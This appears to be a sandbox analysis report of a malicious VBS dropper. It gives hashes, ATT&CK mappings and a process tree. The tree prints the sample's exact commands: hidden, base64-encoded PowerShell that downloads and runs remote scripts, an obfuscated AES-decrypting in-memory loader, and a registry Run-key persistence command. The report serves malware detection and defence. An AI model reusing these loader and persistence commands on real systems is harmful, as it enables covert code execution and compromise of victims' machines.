a63181dff0f68b98712247f51c8a6e7761f8a84261928c297b12f438272c1492

General

Target

5.vbs
Size

1.6MB
MD5

7e0b7c6c89827a608664bf468d850933
SHA1

adcfcf643b371e24d79353f4f88231170229949f
SHA256

a63181dff0f68b98712247f51c8a6e7761f8a84261928c297b12f438272c1492
SHA512

ddfbaaaf6e7f06f5cbaa35e3b188064e71a6b4542185ecf71e0a89ed6411d98059c0b37b8ad3288b4029d5ddf870a3ad9f342fb521331ee1f39a2dad741778bd
SSDEEP

24576:PLOiXTUVNhZXj4TARZ3zRdIwEtiQXNosn/eYwv2FpZHFLKOJFErpvGcZqF:bINzTLgrSK/fJ7HpeYcy

Score

8^/10

discovery execution persistence

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1712	powershell.exe
2796	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "C:\\Users\\Admin\\dwm.bat"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2796	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1712	powershell.exe
2796	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1712	powershell.exe
Token: SeDebugPrivilege	2796	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2368 wrote to memory of 1956	2368	WScript.exe	30
PID 2368 wrote to memory of 1956	2368	WScript.exe	30
PID 2368 wrote to memory of 1956	2368	WScript.exe	30
PID 1956 wrote to memory of 2196	1956	cmd.exe	32
PID 1956 wrote to memory of 2196	1956	cmd.exe	32
PID 1956 wrote to memory of 2196	1956	cmd.exe	32
PID 2196 wrote to memory of 1712	2196	cmd.exe	34
PID 2196 wrote to memory of 1712	2196	cmd.exe	34
PID 2196 wrote to memory of 1712	2196	cmd.exe	34
PID 2196 wrote to memory of 2792	2196	cmd.exe	35
PID 2196 wrote to memory of 2792	2196	cmd.exe	35
PID 2196 wrote to memory of 2792	2196	cmd.exe	35
PID 2196 wrote to memory of 2796	2196	cmd.exe	36
PID 2196 wrote to memory of 2796	2196	cmd.exe	36
PID 2196 wrote to memory of 2796	2196	cmd.exe	36
PID 2196 wrote to memory of 2796	2196	cmd.exe	36

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2368
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2196
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aWV4IChJbnZva2UtV2ViUmVxdWVzdCAtVXJpICJodHRwczovLzB4MC5zdC84WDVULnBzMSIp')))"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1712
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "dwm" /t REG_SZ /d "C:\Users\Admin\dwm.bat" /f
      4⤵
      Adds Run key to start application
      PID:2792
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hiDDen -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3T2k4dk1UVTJMakkxTXk0eU5UQXVOakk2TlRBd01DOWtiM2R1Ykc5aFpDOUhaVzVsY21GMFpXUlRZM0pwY0hRdWNITXhJaWs9JykpKTtlbXB0eXNlcnZpY2VzIC1ldHc7U3RhcnQtU2xlZXAgLVNlY29uZHMgMTA7ZnVuY3Rpb24gaHliaHZnaHJ6bGVhbXd2cHZ6aW1xdWNsb2hiZHBpaGNtdmdqcm9vaSgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ1loYXQ4aGtCbHVnVzJyelF1OG1WVGhQRk5jUzJHZTRYNzNvWXNMeUU1L1E9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OignZ25pcnRTNDZlc2FCbW9yRidbLTEuLi0xNl0gLWpvaW4gJycpKCdIZ01TMzMvSlFUdHVkNjROTXFMaVJ3PT0nKTsJJGRlY3J5cHRvcl92YXI9JGFlc192YXIuQ3JlYXRlRGVjcnlwdG9yKCk7CSRyZXR1cm5fdmFyPSRkZWNyeXB0b3JfdmFyLlRyYW5zZm9ybUZpbmFsQmxvY2soJHBhcmFtX3ZhciwgMCwgJHBhcmFtX3Zhci5MZW5ndGgpOwkkZGVjcnlwdG9yX3Zhci5EaXNwb3NlKCk7CSRhZXNfdmFyLkRpc3Bvc2UoKTsJJHJldHVybl92YXI7fWZ1bmN0aW9uIGR3d252YmFid3p1dmtpc252cHRuZWVicmRjbnJwbHhobGFqdXhvcW0oJHBhcmFtX3Zhcil7CUlFWCAnJGdhZ3FubXJlZHRuY3VhZHp2ZWpzb2psa2I9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFBQUJCQkNDQ2VtQUFBQkJCQ0NDb3JBQUFCQkJDQ0N5U0FBQUJCQkNDQ3RyQUFBQkJCQ0NDZWFBQUFCQkJDQ0NtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTsJSUVYICckbWtqenhwaHpnaGV4a2Rya2lvdnh2bWt4aj1OZXctT2JqZWN0IFN5c3RlbS5JTy5BQUFCQkJDQ0NNQUFBQkJCQ0NDZUFBQUJCQkNDQ21BQUFCQkJDQ0NvQUFBQkJCQ0NDckFBQUJCQkNDQ3lBQUFCQkJDQ0NTQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0NlQUFBQkJCQ0NDYUFBQUJCQkNDQ21BQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJHpzZXh5d292cGFjaGZmZWdjb3R5Ymtic2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FBQUJCQkNDQ29tQUFBQkJCQ0NDcHJBQUFCQkJDQ0NlQUFBQkJCQ0NDc3NBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDR1pBQUFCQkJDQ0NpcEFBQUJCQkNDQ1N0QUFBQkJCQ0NDcmVBQUFCQkJDQ0NhbUFBQUJCQkNDQygkZ2FncW5tcmVkdG5jdWFkenZlanNvamxrYiwgW0lPLkNBQUFCQkJDQ0NvbUFBQUJCQkNDQ3ByQUFBQkJCQ0NDZXNBQUFCQkJDQ0NzaUFBQUJCQkNDQ29uQUFBQkJCQ0NDLkNvQUFBQkJCQ0NDbXBBQUFCQkJDQ0NyZUFBQUJCQkNDQ3NzQUFBQkJCQ0NDaUFBQUJCQkNDQ29BQUFCQkJDQ0NuQUFBQkJCQ0NDTW9kZV06OkRBQUFCQkJDQ0NlQUFBQkJCQ0NDY0FBQUJCQkNDQ29tcEFBQUJCQkNDQ3JlQUFBQkJCQ0NDc3MpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpOwkkenNleHl3b3ZwYWNoZmZlZ2NvdHlia2JzaC5Db3B5VG8oJG1ranp4cGh6Z2hleGtkcmtpb3Z4dm1reGopOwkkenNleHl3b3ZwYWNoZmZlZ2NvdHlia2JzaC5EaXNwb3NlKCk7CSRnYWdxbm1yZWR0bmN1YWR6dmVqc29qbGtiLkRpc3Bvc2UoKTsJJG1ranp4cGh6Z2hleGtkcmtpb3Z4dm1reGouRGlzcG9zZSgpOwkkbWtqenhwaHpnaGV4a2Rya2lvdnh2bWt4ai5Ub0FycmF5KCk7fWZ1bmN0aW9uIGVxYmxxdnp1ZXljdmhlb2l0dmtva253eWFibnhyb3F1dHVqKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckZnZxbmdhem1weXdjYmlrcGJ2ZHBkZGlycXN5cXlpb3JtcXRieWlpYT1bU3lzdGVtLlJBQUFCQkJDQ0NlQUFBQkJCQ0NDZmxBQUFCQkJDQ0NlY3RBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDQXNBQUFCQkJDQ0NzZUFBQUJCQkNDQ21iQUFBQkJCQ0NDbEFBQUJCQkNDQ3lBQUFCQkJDQ0NdOjpMQUFBQkJCQ0NDb0FBQUJCQkNDQ2FBQUFCQkJDQ0NkQUFBQkJCQ0NDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGN2cWhoZWJmamphcHhkZWJuenduYmpuaGplcGxwanF0bWNuaG5iam1yc2hvaHp0amxyPSRmdnFuZ2F6bXB5d2NiaWtwYnZkcGRkaXJxc3lxeWlvcm1xdGJ5aWlhLkFBQUJCQkNDQ0VBQUFCQkJDQ0NuQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0N5QUFBQkJCQ0NDUEFBQUJCQkNDQ29BQUFCQkJDQ0NpQUFBQkJCQ0NDbkFBQUJCQkNDQ3RBQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGN2cWhoZWJmamphcHhkZWJuenduYmpuaGplcGxwanF0bWNuaG5iam1yc2hvaHp0amxyLkFBQUJCQkNDQ0lBQUFCQkJDQ0NuQUFBQkJCQ0NDdkFBQUJCQkNDQ29BQUFCQkJDQ0NrQUFBQkJCQ0NDZUFBQUJCQkNDQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpO30kaWFwZGh2aG5mbXV5b3pncXV4b2dyaWtnaCA9ICRlbnY6VVNFUk5BTUU7JGh3bWdyZmZueXZ2aGtlbnJld2RlemNjZmkgPSAnQzpcVXNlcnNcJyArICRpYXBkaHZobmZtdXlvemdxdXhvZ3Jpa2doICsgJ0FBQUJCQkNDQ1xBQUFCQkJDQ0NkQUFBQkJCQ0NDd0FBQUJCQkNDQ21BQUFCQkJDQ0MuQUFBQkJCQ0NDYkFBQUJCQkNDQ2FBQUFCQkJDQ0N0QUFBQkJCQ0NDJy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkaHdtZ3JmZm55dnZoa2VucmV3ZGV6Y2NmaTskZGNncHo9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRod21ncmZmbnl2dmhrZW5yZXdkZXpjY2ZpKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkZHp4IGluICRkY2dweikgewlpZiAoJGR6eC5TdGFydHNXaXRoKCc6OicpKQl7CQkkZXRoeG49JGR6eC5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kbWx6bWF4d2FydHdncnJoZmV5aG9xbmVpbHRwamJ6aG9heHE9W3N0cmluZ1tdXSRldGh4bi5TcGxpdCgnXCcpO0lFWCAnJG5zd2V1bmhpd21wbGtzam1rb216emhxYWdobXpybGlndGF1PWR3d252YmFid3p1dmtpc252cHRuZWVicmRjbnJwbHhobGFqdXhvcW0gKGh5Ymh2Z2hyemxlYW13dnB2emltcXVjbG9oYmRwaWhjbXZnanJvb2kgKFtBQUFCQkJDQ0NDQUFBQkJCQ0NDb0FBQUJCQkNDQ25BQUFCQkJDQ0N2QUFBQkJCQ0NDZUFBQUJCQkNDQ3J0XTo6QUFBQkJCQ0NDRkFBQUJCQkNDQ3JBQUFCQkJDQ0NvQUFBQkJCQ0NDbUFBQUJCQkNDQ0JBQUFCQkJDQ0NhQUFBQkJCQ0NDc2U2QUFBQkJCQ0NDNEFBQUJCQkNDQ1NBQUFCQkJDQ0N0QUFBQkJCQ0NDcmlBQUFCQkJDQ0NuQUFBQkJCQ0NDZ0FBQUJCQkNDQygkbWx6bWF4d2FydHdncnJoZmV5aG9xbmVpbHRwamJ6aG9heHFbMF0pKSk7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7SUVYICckbWl1bWFqZWl2d2llcnJueGFueHFmY3Z5bmFocWtkaXJqeHg9ZHd3bnZiYWJ3enV2a2lzbnZwdG5lZWJyZGNucnBseGhsYWp1eG9xbSAoaHliaHZnaHJ6bGVhbXd2cHZ6aW1xdWNsb2hiZHBpaGNtdmdqcm9vaSAoW0FBQUJCQkNDQ0NBQUFCQkJDQ0NvQUFBQkJCQ0NDbkFBQUJCQkNDQ3ZBQUFCQkJDQ0NlQUFBQkJCQ0NDckFBQUJCQkNDQ3RdOjpBQUFCQkJDQ0NGQUFBQkJCQ0NDckFBQUJCQkNDQ29BQUFCQkJDQ0NtQUFBQkJCQ0NDQkFBQUJCQkNDQ2FBQUFCQkJDQ0NzQUFBQkJCQ0NDZUFBQUJCQkNDQzZBQUFCQkJDQ0M0QUFBQkJCQ0NDU0FBQUJCQkNDQ3RyQUFBQkJCQ0NDaUFBQUJCQkNDQ25BQUFCQkJDQ0NnKCRtbHptYXh3YXJ0d2dycmhmZXlob3FuZWlsdHBqYnpob2F4cVsxXSkpKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTtlcWJscXZ6dWV5Y3ZoZW9pdHZrb2tud3lhYm54cm9xdXR1aiAkbnN3ZXVuaGl3bXBsa3NqbWtvbXp6aHFhZ2htenJsaWd0YXUgJG51bGw7ZXFibHF2enVleWN2aGVvaXR2a29rbnd5YWJueHJvcXV0dWogJG1pdW1hamVpdndpZXJybnhhbnhxZmN2eW5haHFrZGlyanh4ICgsW3N0cmluZ1tdXSAoJyVBQUFCQkJDQ0MnKSk7')) | Invoke-Expression"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2796

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\c.bat

Filesize
1.6MB

MD5
0f2d6e24c10a0c02a498acb09b8b25d0

SHA1
284ce989d3ba1af43591fa85147d591a11dd3720

SHA256
d2ca5cb28153f404d84cad9dd6b28725015527625a262d3b6471e0458f5ecb85

SHA512
449f0a9754804e6df9794ea58aa67b08bf72b8433619bb0c900e75d4b8e427a17680ffe01709c2ebe8e558db58c9edd0785ce43863a80b7148191f70f17c1d5f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M4PJZG19JFK1873Z92SS.temp

Filesize
7KB

MD5
ed0228b88c7a8629d064ec3bad178cf9

SHA1
49b6af8e8e64bff1cb660de167d6b3637df5b889

SHA256
50a366d588178e4d2c126a805aee5ef042f334c683e0bac901325fddc45862e4

SHA512
fbbce1b79d122c70c621b2af974091ccd01daac9790a0318bdd5935a017d17b2c965a40849e24627c4bb7fabb63f7a7cf2427c64f42224639dad795d50e8012f

Download Submit
memory/1712-13-0x000007FEF5E6E000-0x000007FEF5E6F000-memory.dmp

Filesize
4KB

Download
memory/1712-14-0x000000001B560000-0x000000001B842000-memory.dmp

Filesize
2.9MB

Download
memory/1712-15-0x0000000002240000-0x0000000002248000-memory.dmp

Filesize
32KB

Download
memory/1712-16-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

Filesize
9.6MB

Download
memory/1712-18-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

Filesize
9.6MB

Download
memory/1712-19-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

Filesize
9.6MB

Download
memory/1712-17-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

Filesize
9.6MB

Download
memory/1712-20-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

Filesize
9.6MB

Download
memory/1712-21-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads